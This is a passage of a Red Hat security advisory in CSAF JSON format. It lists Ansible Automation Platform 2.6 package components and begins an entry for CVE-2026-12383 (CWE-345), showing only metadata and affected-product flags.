"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-daphne-0:4.2.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch"
},
"product_reference": "python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-daphne-0:4.2.2-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src"
},
"product_reference": "python3.12-daphne-0:4.2.2-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src"
},
"product_reference": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch"
},
"product_reference": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src"
},
"product_reference": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch"
},
"product_reference": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src"
},
"product_reference": "python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch"
},
"product_reference": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
},
"product_reference": "python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch"
},
"product_reference": "python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-tox-ansible-0:26.7.1-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src"
},
"product_reference": "python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Chris Meyers"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2026-12383",
"cwe": {
"id": "CWE-345",
"name": "Insufficient Verification of Data Authenticity"
},
"discovery_date": "2026-06-16T10:09:09.069000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
